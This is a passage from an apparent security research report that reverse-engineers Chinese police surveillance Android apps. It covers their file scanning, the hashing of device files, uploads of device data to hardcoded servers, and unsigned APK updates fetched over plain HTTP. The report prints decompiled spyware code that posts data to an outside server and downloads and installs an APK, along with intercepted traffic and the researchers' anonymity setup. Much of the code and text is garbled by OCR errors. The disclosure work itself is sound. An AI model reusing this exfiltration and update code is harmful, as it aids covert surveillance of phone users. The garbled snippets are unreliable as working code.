44 { 

45 this.db.beginTransaction(); 

46 localSQLiteStatement = this.db.compileStatement("insert into qb_aj_mb 
(mb_md5,mb_rksj) values (?,?)"); 

47 i = 0; 





48 } 

49 for (;;) 

50 { 

51 if (i >= paramList.size()) 

52 { 

53 this.db.setT ransactionSuccessful(); 

54 this.db.endTransaction(); 

55 Log.e("TAG"j "fSAtiSc^"); 

56 this.db.closeQ; 

57 return; 

58 } 

59 String str = ((MB)paramList.get(i)).getMD5().trim(); 

60 if equals(str)) 

61 { 

62 localSQLiteStatement.bindString(l, str); 

63 localSQLiteStatement.bindString(2, ((MB)paramList.get(i)).getGXSl()); 

64 localSQLiteStatement.execute(); 

65 localSQLiteStatement.clearBindings(); 

66 } 

67 i += 1; 

68 } 

69 } 


Once the initial dataset has been loaded, ExecuteThread::startSM calls okHttpService (line 393) 
to make a request to the base server, the parameter being the return value of DbDao::queryMB 
(line 386), which is the GXSJ (rksj) value of the first MB object in the database expressed by the 
SQLite query (line 159). 


com/itap/utils/ExecuteThread.java: 

386 Object Iocal0bject2 = this.dbDao.queryMB(); 

387 Object localObjectl = localObject2; 

388 if ("".equals(local0bject2)) 

389 { 

390 this.dbDao.addMB(((String)local0bject3).split(",")); 

391 localObjectl = this.dbDao.queryMB(); 

392 } 

393 okHttpService((String)localObjectl); 
com/itap/dbservice/DbDao.java: 

152 public String queryMB() 

153 { 

154 this.db = this.mOpenHelper.getWritableDatabaseQ; 

155 String str = ""; 

156 Object localObject = str; 

157 if (this.db.isOpenQ) 

158 { 

159 localObject = this.db.rawQuery("select mb_rksj from qb_aj_mb order by mb_rksj desc 
null); 

160 if (((Cursor)localObject).moveToNext()) { 

161 str = ((Cursor)localObject).getstring(0); 

162 } 

163 this.db.closeQ; 

164 localObject = str; 

165 } 

166 return (String)localObject; 

167 } 


The ExecuteThread::okHttpService makes requests to the base server, which is hardcoded (line 
531), with a custom "type" flag (line 529) and the GXSJ value (line 530), returned by 



DbDao::queryMB. Assuming, if the local database is out of date the base server will respond 
with a JSON object containing a list of new MB objects that ExecuteThread::okHttpService will 
then add to the local database (line 557), thus updating it. 


com/itap/utils/ExecuteThnead.java: 

526 public void okHttpSenvice(Stning paramString) 

527 { 

528 Object localObject = new FormEncodingBuilderQ; 

529 ((FormEncodingBuilden)localObject).add("type", "lWWS_cshTZM"); 

530 ((FonmEncodingBuilden)localObject).add("GXS1", paramString); 

531 paramString = new 

Request.Builder().url("http://bxaq.landaitap.com:22222/BXAQ/servlet/front/APPS").post(((FormEn 
codingBuilder)localObject).build()).build(); 

532 localObject = new OkHttpClientQ; 

533 ((OkHttpClient)localObject).setConnectTimeout(60000L, TimeUnit.SECONDS); 

534 ((OkHttpClient)localObject).setWriteTimeout(60000L, TimeUnit.SECONDS); 

535 ((OkHttpClient)localObject).setReadTimeout(60000L, TimeUnit.SECONDS); 

536 ((OkHttpClient)localObject).newCall(paramString).enqueue(new Callback() 

537 { 

538 public void onFailure(Request paramAnonymousRequest, IOException 
paramAnonymousIOException) {} 


539 

540 

541 

542 

543 

544 

545 

546 

547 

548 

549 

550 

551 

552 

553 

554 

555 

556 

557 

558 

559 

560 

(i)j 

561 

562 

563 

564 

565 

566 

567 

568 

569 

570 

571 

572 

573 

574 

575 


public void onResponse(Response paramAnonymousResponse) 
throws IOException 

{ 

Object localObject = paramAnonymousResponse.body().string(); 
try 
{ 

if (new HSONObject((String)localObject).getBoolean("success")) 

{ 

paramAnonymousResponse = new ArrayListQ; 

localObject = new HSONObject((String)localObject).getlSONArray("data"); 
if (((ISONArray)localObject).length() > 0) 

{ 

int i = 0; 
for (;;) 

{ 

if (i >= ((ISONArray)localObject).length()) 

{ 

ExecuteThread.this.dbDao.addMB(paramAnonymousResponse); 
return; 

} 

ISONObject locallSONObject = ((ISONArray)localObject).getlSONObject 560 
MB localMB = new MB(); 

localMB.setGXSl(locallSONObject.getString("LRSl")); 
localMB.setMD5(locallSONObject.getString("MD5").toLowerCaseQ); 
paramAnonymousResponse.add(localMB); 
i += 1; 

} 

} 

} 

return; 

} 

catch (ISONException paramAnonymousResponse) 

{ 

paramAnonymousResponse.printStackT race(); 

} 



576 }); 

577 } 


ExecuteThread::startSM finishes updating the local database by performing a local file scan on 
the device's non-root accessible external volume, typically "/sdcard". The file scanning happens 
in ExecuteThread::scanFile (line 399) and digested into WJXX objects, containing the file's 
name, path, size, MD5 hash of the file, and the MD5 of the MD5, in ExecuteThread::loopList 
(line 400). 


GA_A5_5K_GXH/jd/src/com/itap/utils/ExecuteThread.java: 

399 scanFile(Environment.getExternaIStorageDirectoryO.getAbsolutePath ()); //Recursively 
scan SD card for files of particular extensions and return a list 

400 localObjectl = loopListQj //for each file of interest create a list of W1XX objects 
containing the name, path, size, MD5 hash of the file, and the MD5 of the MD5 

401 this.dbDao.addYCXX((List)localObjectl ); //Add it to the database 


For information on what data is sent/stored, refer to section "What local data is accessed, 
stored and/or recorded by the application?". For information on where this data is sent and 
info on the server themselves, refer to section "Where is data sent/stored?". 

Back in ExecuteThread::run, if the version string retrieved from the URL server is newer than 
the installed one, the application will send a message to the MainActivity (line 597), with the 
information digested from version.txt. 


com/itap/utils/ExecuteThread.java: 

579 public void run() 

580 { 

581 for (;;) 

582 { 

595 if (i == 1) 

596 { 

597 sendMessage(this.mainUI.handle, this.info, 1); 

598 return; 

599 } 


The message handler in MainActivity can be seen calling MainActivity::showUpdataDialogQZ 
(line 64) when the Message value is set to 1 (line 57). 


com/itap/sjga/MainActivity$l.smali 

56 .line 196 

57 :pswitch_l 

58 iget-object vl, p0, Lcom/itap/sjga/MainActivity$l;->this$0:Lcom/itap/sjga/MainActivity; 

59 

60 iget-object v0, pi, Landroid/os/Message;->obj:Ljava/lang/Object; 

61 

62 check-cast v0, Lcom/itap/model/Updatalnfo; 

63 

64 invoke-virtual {vl, v0}, Lcom/itap/sjga/MainActivity;- 

>showUpdataDialogQZ(Lcom/itap/model/Updatalnfo;)V 


This presents a dialog stating: Version upgrade. Check the latest version, please update!. It will 
then present the user with Shut down or Update options. If the user clicks Update it will call 
downLoadApk which will attempt to use WIFI to download the new APK. If WIFI is not available 






it will then prompt the user with the dialog The current network in 2G / 3G / 4G, to determine 
whether to update?with the options Shut down or Update. If the user clicks Update it will then 
call downLoadApk to download the new APK over cellular data. If at anytime the user instead 
clicks Shut down it will clean up any data that it was currently exfiltrating and shut down the 
application. 


MainActivity::downLoadApk will make the request to download the APK using the URL located 
in the version.txt file retrieved from the URL server, and it will also append the URL parameters 
from text.txt (line 420): 


com/itap/sjga/MainActivity.java: 

414 new ThreadQ 

415 { 

416 public void run() 

417 { 

418 try 

419 { 

420 DownLoadManagen.getFileFnomSenven(paramUpdataInfo.getUnl() + "?A1LY=" + 
MainActivity.this.ajly, MainActivity.this.pd, MainActivity.this); 

421 sleep(3000L); 

422 MainActivity.this.installApk("/sdcand/lWWS/GA_Al_lK_GXH.apk"); 

423 MainActivity.this.pd.dismiss(); 

424 return; 

425 } 

65 localHttpURLConnection.setRequestMethod("GET"); 


DownLoadManager.getFileFromServer makes a connection to the URL from the version.xml file 
in the CheckVersion call (line 28), creates a new file (line 36) on the user's SD card, and prefixes 
the file with a single byte (line 39) before writing out the the APK data (line 52). 


com/itap/utils/DownLoadManager.java 

23 public static File getFileFromServer(String paramString, ProgressDialog 
paramProgressDialog, Context paramContext) 

24 throws Exception 

25 { 

26 if (Environment.getExternalStorageStateQ.equals("mounted")) 

27 { 

28 paramString = (HttpURLConnection)new URL(paramString).openConnection(); 

29 paramString.setConnectTimeout(5000); 

30 paramProgressDialog.setMax(paramString.getContentLength() / 1024); 

31 paramString = paramString.getlnputStreamQ; 

32 paramContext = new File("/sdcard/lWWS/"); 

33 if (!paramContext.exists()) { 

34 paramContext.mkdir(); 

35 } 

36 paramContext = new File("/sdcard/lWWS/", "GA_A1_1K_GXH.apk"); 

37 FileOutputStream localFileOutputStream = new FileOutputStream(paramContext); 

38 BufferedlnputStream localBufferedlnputStream = new BufferedlnputStream(paramString); 

39 byte[] arrayOfByte = new byte['E']; 

40 int i = 0; 

41 for (;;) 

42 { 

43 int j = localBufferedlnputStream.read(arrayOfByte); 

44 if (j == -1) 

45 { 

46 


localFileOutputStream.close(); 




47 localBufferedInputStream.close(); 

48 paramString.close(); 

49 pa ramProgressDialog. set ProgressNumber Format ( "TStb^iJc" ); 

50 return paramContext; 

51 } 

52 localFileOutputStream.write(arrayOfByte, 0, j); 

53 i += j; 

54 paramProgressDialog.setProgress(i / 1024); 

55 } 


As previously stated, MainActivity::downLoadApk then calls installApk, which will attempt to 
install the newly downloaded file by creating a new intent to prompt the user for permission: 


src/com/itap/sjga/MainActivity.java: 

309 Intent locallntent = new Intent("android.intent.action.VIEW"); 

310 locallntent.addFlags(268435456); 

311 locallntent.setDataAndType(Uri.fromFile(new File(paramString)), 

"application/vnd.android.package-archive"); 

312 startActivity(locallntent); 


Other Android APKs were found were provided by OTF and also discovered by the research 
team from hxxp://47.93.5.238:8081. 

References: 

• URL server: hxxp://47.93.5.238:8081 

• Base server: hxxp://bxaq.landaitap.com:22222 (hxxp://47.93.5.238:22222) 




Q5: What is the security of the access, storage, and recording of data? 

GA_AJ_JK_GXH.apk (Net Guard Application): 

The application uses standard libraries and permissions to access external storage and the 
internet. However, when it performs update checks and downloads it does so over an un¬ 
secure HTTP channel, which can leave the user vulnerable to man-in-the-middle attacks. This is 
further examined below. 

To access and retrieve data from the device, the application uses standard mechanisms that 
requests permissions from the OS, extracts essential information from the device, and 
reads/writes data to external storage. While these mechanisms are standard, how the 
permissions are requested can be very subtle to the user. The research team used a phone 
running Android Lollipop to dynamically analyze this application. During so the research 
observed the permissions request only once, during the installation of the APK, but no other 
times afterwards. 


The following is the application's manifest file containing the permissions requested and 
breakdown of what each means: 


GA_A3_3K_GXH/apktool/GA_AJ_3K_GXH/AndnoidManifest.xml: 

3: <uses-permission android:name="android.permission.INTERNET"/> 

4: <uses-permission android:name="android.permission.READ_PHONE_STATE"/> 

5: <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/> 

6: <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> 

7: <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/> 

8: cuses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/> 

9: <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> 

10: <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/> 

11: <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/> 

12: <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/> 


As seen below, the application asks for multiple permissions: 




E3 

Do you want to install this application? It 
will get access to: 

PRIVACY 

V, read phone status and identity 

modify or delete the contents of your SD 
card 

read the contents of your SD card 

DEVICE ACCESS 

full network access 
view network connections 
view Wi-Fi connections 

□ run at startup 


CANCEL INSTALL 


< O D 


INTERNET 

• Allows an application to create network sockets. 

R E AD_P H 0 N E_ST ATE 

• Allows the application to access the phone features of the device. An application with 
this permission can determine the phone number and serial number of this phone, 
whether a call is active, the number that call is connected to and so on. 

ACCESS WIFI STATE 


Allows an application to view the information about the status of Wi-Fi. 





MOUNT_UNMOUNT_FILESYSTEMS 

• Allows the application to mount and unmount file systems for removable storage. 
WRITE_EXTERNAL_STORAGE 

• Allows an application to write to the SD card. 

READ_EXTERNAL_STORAGE 

• Allows an application to read from SD Card. 

ACCESS_NETWORK_STATE 

• Allows an application to view the status of all networks. 

RECEIVE_BOOT_COMPLETED 

• Allows an application to start itself as soon as the system has finished booting. This can 
make it take longer to start the phone and allow the application to slow down the 
overall phone by always running. 

It leverages the following the following libraries to obtain this information: 

• android.content.Context 

• android.net.wifi.Wifilnfo 

• android.net.wifi.WifiManager 

• android.os.Build 

• android.telephony.TelephonyManager 

• java.net.Networklnterface 

• java.net.SocketException 

• java.util.Enumeration 

The application has a screenshot feature to capture images of the list of dangerous file, if 
found. These images are saved and exported to the device's image gallery (/sdcard/DCIM), 
where it will reside until manually removed. 

Aside from this, the application is relatively good about cleaning up after itself. In its lifecycle it 
creates the following files: 

• /sdcard/JWWS/GA_AJ_JK_GXH.apk 

• /s d ca rd /J W WS/J W WS/s h o u j i_a n j i a n/j bxx. txt 

• /sdcard/JWWS/JWWS/shouji_anjian/files.txt 

• /sdcard/JWWS/JWWS/shouji_anjian/JWWS.zip 




Once these files are used they are promptly deleted. MainActivity deletes JWWS.zip, and 
everything in it's containing folder, once the upload is completed and any time the application 
is exited. 


com/itap/sjga/MainActivity.java: 

190 private void deleteFlieQ 

191 { 

192 File localFilel = new File(Constant.ZIPPATH); 

193 File localFile2 = new File(Constant.FILEPATH); 

194 if (localFilel.exists()) { 

195 delete(localFilel); 

196 } 

197 if (localFile2.exists()) { 

198 delete(localFile2); 

199 } 

200 } 

com/itap/sjga/MainActivity.java: 

315 private void testUploadFile(Context paramContext) 

316 { 

343 MainActivity.this.deleteFlie(); 

com/itap/sjga/MainActivity.java: 

506 protected void onDestroy() 

507 { 

515 deleteFlieQ ; 


ExecuteThread also recursively deletes everything in /JWWS/JWWS/shouji_anjian/ before 
startSM begins scanning files. 


com/itap/utils/ExecuteThread.java: 

57 public static void deleteFile(File paramFile) 

58 { 

59 if (!paramFile.exists()) { 

60 return; 

61 } 

62 if (paramFile.isFile()) 

63 { 

64 paramFile.deleteQ; 

65 return; 

66 } 

67 File[] arrayOfFile = paramFile.listFilesQ; 

68 int j = arrayOfFile.length; 

69 int i = 0; 

70 for (;;) 

71 { 

72 if (i >= j) 

73 { 

74 paramFile.deleteQ; 

75 return; 

76 } 

77 deleteFile(arrayOfFile[i]); 

78 i += 1; 

79 } 

80 } 

com/itap/utils/ExecuteThread.java: 

380 private void startSMQ 

381 { 



404 Iocal0bject3 = new File(this.context.getExternalFilesDir(null).getAbsolut 

404 ePath() + "/3WWS/3WWS/shouji_anjian/"); 

405 deleteFile((File)local0bject3); 


Also, the application uses un-encrypted HTTP channels to check and download version updates 
and to transfer and upload user data. This is dangerous as it allows man-in-the-middle (MITIM) 
attacks. For more information regarding what information is sent between the application and 
the server, refer to sections What privacy problems might be in the application? and Where is 
data sent/stored? for more information. 

References: 

• URL server: hxxp://47.93.5.238:8081 

• Base server: hxxp://bxaq.landaitap.com:22222 (hxxp://47.93.5.238:22222) 



Q6: What privacy problems might be in the application? 

GA_AJ_JK_GXH.apk (Net Guard Application): 

All communication performed from the device to the URL server (updating) and the base server 
(data exfiltration) is done over un-encrypted HTTP. An actor man-in-the-middling on a local 
network would be able to see all traffic between the application on a user's phone and the base 
server. This is further explained below. 

Un-encrypted HTTP channels are used to check and download version updates and to transfer 
and upload user data. This is dangerous as any actor man-in-the-middling (MITIM) could 
manipulate this network traffic to achieve a series of objectives. 

Unsigned updates (shown below) means that any actor could provide a user with their own 
malicious APK. 

Response from http://47.93.5.23B:8031 /APP/VER510N/jingwangweishi_version/version.xmI 


Forward , | Drop , Intercept is on ( Action 


■ 

Headers 

Hex 

XML 



HTTP/1.1 200 OK 
Server: Apache-Coyote/1.1 
Accept-Ranges: bytes 
ETag: W/"230-1501747279000" 

Last-Modified : 

Content-Type: application/xml;charset=utf-8 
Content-Length: 230 
Date: 

Connection: close 

<?xml version="l. 0" encoding="utf-8"?> 

<info> 

<version>l. 3</ version* 

<url>http: //47.93.5.238:8081/APP/GA_AJ_JK/GA_AJ_JK_GXH. apk</url> 

<descript ion>D □□□□□□□□□□□DO </description> 

</info> 


The transfer of un-encrypted means that any actor can read sensitive user information or frame 
a user by injecting false file metadata to inform the authorities. 























1/1 Request to http://47.93.5.238:22222 


Forward Drop Intercept is on Action 


Raw 

Pa rams 

Headers 

Hex 


POST /BXAQ/servlet/front/APPS?type=XXCJ HTTP/1.1 

Content-Type: multipart/form-data; boundary=ff6aaf09-00b2-443f-8752-8626ca01497e 

Content-Length: 1548 

Host: bxaq.landaitap.com:22222 

Connection: close 

Accept-Encoding: gzip, deflate 

User-Agent: okhttp/2.7.2 

--ff6aaf09-00b2-443f-8752-8626ca01497e 
Content-Disposition: form-data; name="AJLY" 

Content-Length: 12 

650102000000 

--ff6aaf09-00b2-443f-8752-8626ca01497e 
Content-Disposition: form-data; name="QBID" 

Content-Length: 0 


References: 

• URL server: hxxp://47.93.5.238:8081 

• Base server: hxxp://bxaq.landaitap.com:22222 (hxxp://47.93.5.238:22222) 





















APPENDICES 


Al: Other APKs Provided by OTF 


GA_AJ_JK_GXH.apk 

This was the primary application APK reviewed. The "app_name" (/^K02±) roughly translates 
to "Net Guard". The APK was acquired via the QR code on the main JingWang website 
(hxxp://jw.js.vnet.cn). The QR code (see image below) decodes to an URL 
(hxxp://47.93.5.238:8081/APP/GA_AJ_JK/GA_AJ_JK_GXH.apk?AJLY=650102000000). When this 
QR code is scanned by an Android device it will perform a download of the APK file. 



Additionally, four APKs were provided by the client to the research team. GA_AJ_JK_GXH.apk 
was one of those four. The APK provided by the client (Named GA_AJ_JK_GXH.apk) and the one 
discovered by the research team (Also named GA_AJ_JK_GXH.apk) were found to be the same 
application in code and functionality, but contained differing release versions. 

This can be seen in the following string comparison. 

First the APK provided by the client: 


% less -N apktool.yml 

21 versionlnfo: 

22 versionCode: '1' 

23 versionName: '1.2' 

res/layout/activity_main.xml:6: cTextView android: textSize="18.0sp" 

android:textColor="#ffffffff" android:layout_width="wrap_content" 

android:layout_height="wrap_content" android:layout_marginLeft="4.0dip" android:text=± 
(VI.2)" android:layout_toRightOf="@id/title_back_img" android:layout_centerVertical="true" /> 


Next the APK discovered by the research team 

(hxxp://47.93.5.238:8081/APP/GA_AJ_JK/GA_AJ_JK_GXH.apk?AJLY=650102000000) 


% less -N apktool.yml 


21 versionlnfo: 


22 versionCode: 

'1' 

23 versionName: 

'1.3' 








apktool/GA_Al_lK_GXH/res/layout/activity_main.xml:6: cTextView 

android:textSize="18.0sp" android:textColor="#ffffffff" android:layout_width="wrap_content" 
android:layout_height="wrap_content" android:layout_marginLeft="4.0dip" android:text= dr 
(VI.3)" android:layout_toRightOf="@id/title_back_img" android:layout_centerVertical="true" /> 


SJ_AJ.apk and SJ_GA.apk 

SJ_AJ.apk and SJ_GA.apk whose "app_name" roughly translates to Public Security 

Bureau Safety Check were discovered by the research team when exploring the base URL of the 
decoded QR code (hxxp://47.93.5.238:8081/APP) 

Additionally, these APKs were two of the four provided by the client to the research team. The 
two APKs provided by the client and the two discovered by the research team were found to be 
the same in code, functionality, and release versions (VI.0). 

SJ_AJ.apk and SJ_GA.apk are also the same in code, functionality, and release version. The only 
differing files/code between SJ_AJ.apk and SJ_GA.apk was the res/raw/text.txt file, specifying 
different AJLY, QBID, and SJH URL parameters issued when downloading the APK from the URL 
server. 


% cat Sl_Al/apktool/Sl_Al/res/raw/text.txt 

A1LY=0.5997951215337043&QBID=0.04835488603808891&SJH=0.18707808335696785% 
% cat Sl_GA/apktool/Sl_GA/res/raw/text.txt 
Al LY=BXAQ&QBID=15111038457170608114512&S11-1=15111038457 


BXAQ_1.9.0.apk 

This APK was one of four provided to the research team by the client, and was the only one that 
was not discovered from the base URL of the decoded QR code (hxxp://47.93.5.238:8081/APP). 
It is a much larger application at ~55MB, in comparison the other three which are just under 
2MB. 


%du -h bxaq/original/BXAQ_1.9.0.apk 
55M bxaq/original/BXAQ_1.9.0.apk 
% du -h GA_A1_1K_GXH.apk 
1.3M GA_A1_1K_GXH.apk 
% du -h sj_aj/original/Sl_Al.apk 
1.9M sj_aj/original/Sl_Al.apk 
% du -h sj_ga/original/Sl_GA.apk 
1.9M sj_ga/original/Sl_GA.apk 


The application also contains native libraries that are explicitly loaded when the application is 
ran. Some contain dubious exports. 


% grep -rn "System\.loadLibrary" src/com/itap 

src/com/itap/view/ideard/LPR.java:9: System.loadLibrary("LPRecognition"); 

src/com/itap/view/user/SplashActivity.java:36: System.loadLibrary("diff "); 







Exports 


IDA View-A 


Hex View-1 


Name 



ElZ2_crc32Table 

ElZ2_decompress 

ElZ2_h bAssig nCodes 

ElZ2_h bCreateDecodeTa bles 

ElZ2_h bMa keCodeLengths 

BZ2_indexlntoF 

BZ2_rNums 

Jaua_com_ita p_uti ls_Dit'f iJti ls_gen Diff 

Java_com_ita p_uti ls_Patch Uti ls_patch 

_Unwi nd_Complete 

_Unwind_DeleteException 

_Unwind_GetCFA 

_Unwi nd_GetData Rel Ease 

_Unwi nd_GetLa ng uageSpecif icData 

JJnwi nd_GetReg i'OnSta rt 

_Unwi nd_GetTextRel Ease 

_Unwi nd_V RSjGet 

_Unwind_VRS_Pop 

_Unwind_VR5_5et 

_FIMI_A RRAY_ 


B 


Address 


Ordinal 


00017A34 
0000A0C0 
OOOOBFFO 
0000C02C 
0000C12S 
00003 El E0 
00017E34 
OOOOOA13 
OOOOAOOC 
0000D4C0 
0000D4C4 
0000D4BB 
0000E4E>4 
0000E4 DC 
OOOOE514 
0000E4CC 
0000D408 
OOOODF60 
0000D454 
00017020 


Some of these libraries are potentially packed or compressed. 


% grep -nr "libs_2_InputMethod" * 

apktool/BXAQ_l.9.0/smali/com/itap/view/xiaoxi/QingBaReplyActivity.smali:2577: const-string 

v5 , "/data/data/com.itap.app/lib/libs_2_InputMethod.so" 

% file apktool/BXAQ_1.9.0/lib/armeabi/libs_2_InputMethod.so 
apktool/BXAQ_l.9.0/lib/armeabi/libs_2_InputMethod.so: data 
% hexdump -C apktool/BXAQ_1.9.0/lib/armeabi/libs_2_InputMethod.so 
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Other Notes 

There was no evidence found of GA_AJ_JK_GXH.apk potentially downloading and replacing 
itself with SJ_AJ.apk, SJ_GA.apk, or BXAQ_1.9.0.apk. There was also no evidence found that has 
lead the research team to believe that SJ_AJ.apk and SJ_GA.apk downloads and updates to 
newer versions. 


A2: Setup Process and Tools 

All research was performed with the following considerations: 

• One-time use laptop for research. Android emulation, and interfacing with the target 
cellphone 

• Linux OS with full disk encryption and no running network services 

• Research was performed within a KVM instance running Linux 

• Android emulation was performed with MobSF using Virtualbox VM and a custom 
modified X86 Android emulator running Android 5.1 

• The X86 Android emulator running Andriod 5.1 was instrumented through ADB and was 
used for the bulk of the dynamic analysis portion. Additionally, it had spoofed GPS 
locations, spoofed SIM and system information, spoofed network interfaces and 
statuses, and all network traffic was intercepted by Burp suite on the host computer 

• Internet connectivity was provided via public WIFI or a 4G USB modem with an AT&T 
prepaid tablet contract 

• The laptop provided internet to the phone over USB 

• All connections were tunneled through IVPN multi-hop service. Entered through foreign 
country servers and exited through another foreign server when performing research 
and connecting to the URL or base server. 

• One-time use cell phone (Moto G4) was used to install and run the target application 

• The phone had its cameras, microphones, and antennas removed. When operating. It 
was kept within a Faraday cage to prevent wireless emanations 

• The phone was flashed with a Lineage OS, with English Canadian locale set, all possible 
diagnostic telemetry disabled, network discovery services disabled, and wireless 
peripherals disabled, and Google apps were not installed 

• All devices has had their data and cache securely wiped and have been destructively 
discarded 


















• All hardware was purchased with cash. A pre-paid debit card was used to purchase the 
AT&T prepaid SIM card and service. The pre-paid debit card was then traded for bitcoin 
to anonymously purchase IVPN service. 

• MobSF was performed to aid in static code analysis and watch for abnormal behavior 
during dynamic analysis 

• JD was used to decompile the APK into readable Java class files. This provided the 
primary set of resources for reversing. 

• Apktool was used convert the Java dex files to smali for analysis, patching, and 
extracting APK assets. Occasionally both JD and MobSF would decompile code 
incorrectly. In these situations, the smali was reversed 

• IDAPro was used to analyze the native libraries in BXAQ_1.9.0.apk 


A3: Server-side Information Enumeration 

There is one server hosting services on two ports that the Android application communicates 
with over HTTP: 

URL server: hxxp://47.93.5.238:8081 

• Uses a Tomcat web server 

• Hosts GA_AJ_JK_GXH.apk, SJ_AJ.apk, SJ_GA.apk, version.xml files, and HTML/Javascript 
files to aid in downloading the APKs 

• Observed to be used for checking application updates and initial download via QR code 

The application version checks making a GET request for a version.xml file on a server (line 10), 
which is a string (url_server) referenced from the application's res/values/strings.xml file: 


nes/values/stnings.xml: 

1 <?xml vension="1.0" encoding="utf-8"?> 

2 <nesounces> 

10 <stning 

name="url_server">http://47.93.5.238:8081/APP/VERSION/jingwangweishi_vension/version.xmlc/stri 
ng> 


Base server: hxxp://bxaq.landaitap.com:22222 (hxxp://47.93.5.238:22222) 

• Serves a mobile API over a servlet 

• Serves an iTap login portal 

• Observed to be used for local database syncing and uploading of device information 
(essential information) and metadata of local files on external storage (WBXX) 

A iTap login portal was discovered on the server and is most likely intended for the BXAQ 
application. 
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